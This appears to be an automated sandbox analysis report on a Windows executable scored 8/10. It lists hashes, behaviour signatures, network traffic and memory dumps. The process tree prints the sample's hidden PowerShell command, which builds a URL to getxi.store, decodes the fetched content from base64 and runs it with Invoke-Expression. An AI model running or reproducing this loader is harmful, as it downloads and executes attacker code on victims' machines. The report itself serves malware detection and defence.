Overview

overview

10

Static

static

10

void/0394b...43.exe

windows7-x64

3

void/0394b...43.exe

windows10-2004-x64

3

void/0aa21...0f.elf

ubuntu-24.04-amd64

1

void/250bb...13.exe

windows7-x64

6

void/250bb...13.exe

windows10-2004-x64

6

void/257ff...b4.exe

windows7-x64

1

void/257ff...b4.exe

windows10-2004-x64

8

void/37208...92.elf

debian-9-mips

void/43958...0d.exe

windows7-x64

10

void/43958...0d.exe

windows10-2004-x64

10

void/469a3...1b.ps1

windows7-x64

10

void/469a3...1b.ps1

windows10-2004-x64

10

void/5a099...8b.exe

windows7-x64

1

void/5a099...8b.exe

windows10-2004-x64

1

void/72cb9...de.elf

ubuntu-22.04-amd64

10

void/73055...90.exe

windows7-x64

3

void/73055...90.exe

windows10-2004-x64

3

การ�...��.exe

windows7-x64

8

การ�...��.exe

windows10-2004-x64

8

void/7ac64...d2.exe

windows7-x64

1

void/7ac64...d2.exe

windows10-2004-x64

8

void/7b380...cc.dmg

macos-10.15-amd64

1

Brew/Brew

macos-10.15-amd64

4

void/7dec8...a.html

windows7-x64

3

void/7dec8...a.html

windows10-2004-x64

4

void/80e6e...e3.exe

windows7-x64

3

void/80e6e...e3.exe

windows10-2004-x64

3

void/82231...6b.exe

windows7-x64

1

void/82231...6b.exe

windows10-2004-x64

8

void/8732e...71.exe

windows7-x64

1

void/8732e...71.exe

windows10-2004-x64

8

void/8c55a...97.elf

debian-12-mipsel

7

Analysis

  • max time kernel
    102s
  • max time network
    120s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/03/2025, 20:20 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    void/257ffa778469d570082f7cfff1ad199a9bffffc278e9c012bea17d02393b95b4.exe

  • Size

    214KB

  • MD5

    561535d4ea4f26088f5bb93c0261be4b

  • SHA1

    5e5b7ff4650caaf0dd556e2e62154c60986a2681

  • SHA256

    257ffa778469d570082f7cfff1ad199a9bffffc278e9c012bea17d02393b95b4

  • SHA512

    772edd0ae2427b8b87c9244ce43d70a24df19b1f3173cda91735bee41e1470d6b31728989bcdbfaaea03cbbd34d4803e3135dad074a11255e1021efa18485ed9

  • SSDEEP

    3072:xPiUbLW99ZIGfsic0GC0dOiN2OPeyZU+gcdtA74Lw4bit2t81lenOsv6fn3:xPiUbLW9lsZ0GC0dOUe/0Lw4tKhy6f3

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\void\257ffa778469d570082f7cfff1ad199a9bffffc278e9c012bea17d02393b95b4.exe
    "C:\Users\Admin\AppData\Local\Temp\void\257ffa778469d570082f7cfff1ad199a9bffffc278e9c012bea17d02393b95b4.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -WindowStyle Hidden -NoP -NonI -ExecutionPolicy Bypass -Command " $mode='getxi.'; $userAgent='gift-3.2'; $wallet='store'; $trading='/developer'; $AI='https://'; $developer=$AI+$mode+$wallet+$trading; $Response=Invoke-WebRequest -Uri $developer -UseBasicParsing -UserAgent $userAgent; $Content=$Response.Content; $t=$Content -replace '<[^>]*>', ''; $s=[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($t)); Invoke-Expression $s "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5616

Network

  • flag-us
    DNS
    getxi.store
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    getxi.store
    IN A
    Response
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.ax-0001.ax-msedge.net
    g-bing-com.ax-0001.ax-msedge.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid=
    Remote address:
    150.171.28.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=013E0D8EE46D6CC60720183BE5E66D1E; domain=.bing.com; expires=Tue, 14-Apr-2026 20:22:33 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 2DE1D73ACEA7415B85D98835807C43E7 Ref B: FRA31EDGE0508 Ref C: 2025-03-20T20:22:33Z
    date: Thu, 20 Mar 2025 20:22:32 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid=
    Remote address:
    150.171.28.10:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=013E0D8EE46D6CC60720183BE5E66D1E
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=FGw6N5IcrQyxlvJyStGXH7mZDsy54Aps_5fgmFR4itw; domain=.bing.com; expires=Tue, 14-Apr-2026 20:22:33 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 4D8C83C899A94143955892930A769966 Ref B: FRA31EDGE0508 Ref C: 2025-03-20T20:22:33Z
    date: Thu, 20 Mar 2025 20:22:32 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid=
    Remote address:
    150.171.28.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=013E0D8EE46D6CC60720183BE5E66D1E; MSPTC=FGw6N5IcrQyxlvJyStGXH7mZDsy54Aps_5fgmFR4itw
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: CCB64125A1DD44CAB0D7B3480D51483A Ref B: FRA31EDGE0508 Ref C: 2025-03-20T20:22:33Z
    date: Thu, 20 Mar 2025 20:22:32 GMT
  • flag-us
    DNS
    c.pki.goog
    Remote address:
    8.8.8.8:53
    Request
    c.pki.goog
    IN A
    Response
    c.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.180.3
  • flag-gb
    GET
    http://c.pki.goog/r/r1.crl
    Remote address:
    142.250.180.3:80
    Request
    GET /r/r1.crl HTTP/1.1
    Cache-Control: max-age = 3000
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
    Response
    HTTP/1.1 304 Not Modified
    Date: Thu, 20 Mar 2025 19:59:16 GMT
    Expires: Thu, 20 Mar 2025 20:49:16 GMT
    Age: 1457
    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
    Cache-Control: public, max-age=3000
    Vary: Accept-Encoding
  • 150.171.28.10:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid=
    tls, http2
    2.0kB
     9.4kB
     21
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c09a4620a532483596a0be4e35d1b86e&localId=w:F0FEBB8E-8133-CF04-82BA-93AC06D5D739&deviceId=6896216935726017&anid=

    HTTP Response

    204
  • 142.250.180.3:80
    http://c.pki.goog/r/r1.crl
    http
    384 B
     355 B
     4
    3

    HTTP Request

    GET http://c.pki.goog/r/r1.crl

    HTTP Response

    304
  • 8.8.8.8:53
    getxi.store
    dns
    powershell.exe
    57 B
     122 B
     1
    1

    DNS Request

    getxi.store

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
     148 B
     1
    1

    DNS Request

    g.bing.com

    DNS Response

    150.171.28.10
    150.171.27.10

  • 8.8.8.8:53
    c.pki.goog
    dns
    56 B
     107 B
     1
    1

    DNS Request

    c.pki.goog

    DNS Response

    142.250.180.3

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mqmtudja.h3s.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/5616-0-0x00007FFB04FD3000-0x00007FFB04FD5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/5616-1-0x00000155EC770000-0x00000155EC792000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5616-11-0x00007FFB04FD0000-0x00007FFB05A91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5616-12-0x00007FFB04FD0000-0x00007FFB05A91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5616-13-0x00007FFB04FD0000-0x00007FFB05A91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5616-14-0x00007FFB04FD0000-0x00007FFB05A91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5616-17-0x00007FFB04FD0000-0x00007FFB05A91000-memory.dmp

    Filesize

    10.8MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.